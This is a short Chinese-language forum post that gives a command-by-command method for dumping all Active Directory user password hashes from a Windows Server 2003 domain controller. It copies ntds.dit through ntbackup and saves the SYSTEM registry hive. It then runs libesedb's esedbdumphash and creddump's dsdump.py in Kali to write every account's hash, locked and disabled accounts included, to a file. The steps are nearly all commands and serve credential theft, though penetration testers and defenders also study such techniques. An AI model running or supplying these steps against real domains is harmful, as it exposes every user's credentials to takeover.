灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:1435回复:0

2003(32/64位)导出AD域控用户hash的终极方法

楼主#
更多 发布于:2013-11-27 14:31
 一:
1,首先登陆域控提取ntds.dit,在2003命令行里输入c:\>ntbackup

使用备份向导(高级)选择只保存系统状态然后选择输出文件名(左下角选择导出指定文件夹)。
2,然后提取注册表cmd>reg save hklm\system system.hive

3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:进入kali虚拟机,然后下载文件ntds_dump_hash.zip解压安装。

#cd libesedb
#./configure && make
修复数据库文件
#cd esedbtools
 #./esedbdumphash -v -t /tmp/output /tmp/ntds.dit
 #ls -1 /tmp/output.export/
导出数据库hash
#cd ../../creddump/
 #chmod+x *.py
 #./dsuserinfo.py /tmp/output.export/datatable
 #./dsdump.py <system file=""> /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt
来自:http://www.metasploit.cn/
print"usage: %s <system hive=""> <datatable> [options]"% sys.argv[0]
   print"  options:"
   print"    --include-locked"
   print"    --include-disabled"

喜欢0 评分0
游客

返回顶部